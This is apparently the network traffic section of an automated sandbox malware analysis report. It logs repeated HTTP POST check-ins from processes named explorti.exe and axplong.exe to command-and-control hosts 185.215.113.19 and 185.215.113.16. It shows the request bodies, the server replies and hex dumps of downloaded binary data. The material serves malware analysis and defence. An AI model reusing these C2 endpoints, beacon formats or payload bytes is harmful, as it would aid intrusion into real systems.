Jul 26, 2024 17:57:10.354363918 CEST	1236	IN	Data Raw: 89 c1 31 d1 83 f1 ff 09 d0 21 c8 b9 1e 17 df 2e 31 d2 f7 f1 b9 28 94 fa 61 81 f1 14 50 bd 8e 21 c1 83 f1 ff 05 3c c4 47 ef ba 81 72 a6 b6 81 f2 80 72 a6 b6 01 d0 01 c8 b9 8b a9 c1 1b 81 f1 3f 18 cc 37 31 d2 f7 f1 89 44 24 4c e8 f8 df 00 00 8b 44 Data Ascii: 1!.1(aP!<Grr?71D$LD$L=ce+'3'wW1!Wf1>N)=V\|HL$xHT$PDu'Dr'9&l5VPA1EAEE!DDAEE!EEAAUA
Jul 26, 2024 17:57:10.354373932 CEST	1236	IN	Data Raw: 27 00 41 81 f0 3e 98 a9 9a b9 ae c8 10 7b 81 f1 51 37 ef 84 45 89 c1 41 31 c9 89 c2 44 21 ca 89 c1 44 09 c9 83 f1 ff 0f af ca 89 c2 44 21 c2 44 09 c0 0f af c2 01 c8 b9 df 81 d6 ac 81 f1 ab e6 a4 e5 29 c8 b9 97 ea 51 f7 81 f1 e2 46 09 8b 29 c8 05 Data Ascii: 'A>{Q7EA1D!DD!D)QF)tgrI!J.6F1!OG%OG%)b(1=J~lH$'D'EA!X,3EA1D!AAE!DAAA5CD!AA5C
Jul 26, 2024 17:57:10.354527950 CEST	1236	IN	Data Raw: 80 8a a3 41 81 f0 8f 7f 75 5c 44 31 c2 09 d0 83 f1 ff ba ff ff ff ff 81 f2 85 e6 b2 2d 09 d1 83 f0 ff 83 f1 ff 09 c8 25 04 da a3 18 b9 46 9c b0 c1 81 f1 bf 80 4f 1d 39 c8 0f 83 02 02 00 00 48 8b 8c 24 90 00 00 00 8b 05 7c 93 27 00 44 8b 0d 79 93 Data Ascii: Au\D1-%FO9H$\|'Dy'+(EA1AE!DA]VLA/D1AAE!DAns-"EZ4.")9Bk-1rn<D$,^H$D$,HHL$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	61187	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:09.577321053 CEST	182	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 30 33 30 30 32 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000003002&unit=246122658369
Jul 26, 2024 17:57:10.337291002 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	61189	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:10.484380960 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:11.254085064 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:11.495183945 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:57:11.765799046 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	61192	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:12.343163967 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:12.914572001 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:12.927656889 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:57:13.179826975 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	61200	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:13.564770937 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:14.309614897 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:14.399780035 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:57:14.655611992 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	61201	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:14.374139071 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 32 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000028001&unit=246122658369
Jul 26, 2024 17:57:15.109636068 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	61205	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:15.293037891 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:15.805188894 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:16.154151917 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:57:16.421125889 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	61215	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:15.602108955 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:16.420073986 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:16.423264980 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:57:16.680763006 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	61219	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:16.656373024 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:17.343669891 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:17.416371107 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:57:17.663953066 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	61220	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:17.067948103 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:17.845187902 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:17.940484047 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:57:18.193816900 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	61225	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:17.981060982 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:18.687988043 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:18.696666956 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:57:18.945744991 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	61227	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:18.382858038 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:19.133766890 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:19.280437946 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:57:19.557188034 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	61228	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:19.490499020 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:20.023085117 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:20.151093960 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:57:20.397716045 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	61232	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:20.080157995 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:20.704958916 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:20.724965096 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:57:20.980639935 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
